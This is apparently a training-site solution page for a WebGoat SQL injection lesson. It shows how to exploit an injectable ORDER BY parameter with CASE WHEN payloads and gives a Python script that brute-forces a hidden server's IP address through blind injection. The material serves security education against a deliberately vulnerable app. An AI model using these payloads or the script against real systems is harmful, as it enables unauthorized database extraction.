SQL Injection Mitigation (10)

In this assignment try to perform an SQL injection through the ORDER BY field. Try to find the ip address of the webgoat-prd server, guessing the complete ip address might take too long so we give you the last part: xxx.130.219.202

Note: The submit field of this assignment is NOT vulnerable for an SQL injection.

Solution

⚠️ Buggy lesson with the last version, a call to http://localhost:8080/WebGoat/SqlInjection/servers sends back an error.

💡 Try sorting and look at the request 💡 Intercept the request and try to specify a different order by 💡 Use for example "(case when (true) then hostname else id end)" in the order by and see what happens

  • Click on column sort performs a request to http://localhost:8080/WebGoat/SqlInjection/servers?column=ip. This can be exploited by intercepting the request with Browser Tools and providing prepared string as column value.

  • To get the idea about webgoat-prd IP address we first have to find out the table name and ip column name. The obvious guess is servers and ip: column=(CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)

  • If that is the correct table and column name, the table will get sorted by ids.

  • So after intercepting and changing the request we get the table sorted by ids, the guess was correct.

  • Just to check our logic, lets send request with: column=(CASE WHEN (SELECT ip FROM whatever WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)

  • It get's an error page, we have everything to script the attack now.

import json  
import requests  
  
def sql_injection_mitigation_10():  
	 index = 0  
  
	 headers = {  
		 'Cookie': 'JSESSIONID=id'  
	 }  
  
	 while True:  
		 payload = '(CASE WHEN (SELECT ip FROM servers WHERE hostname=\'webgoat-prd\') LIKE \'{}.%\' THEN id ELSE hostname END)'.format(index)  
  
		 r = requests.get('http://host:port/WebGoat/SqlInjection/servers?column=' + payload, headers=headers)  
  
		 try:  
			 response = json.loads(r.text)  
		 except:  
			 print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
			 return  
  
		 if response[0]['id'] == '1':  
			 print('webgoat-prd IP: {}.130.219.202'.format(index))  
			 return  
		 else:  
			 index += 1  
			 if index > 255:  
				 print("No IP found")  
				 return  
  
sql_injection_mitigation_10()
PreviousSQL Injection Mitigation (6)NextA3:2021 - Cross-Site Scripting (XSS) | Cycubix Docs

Last updated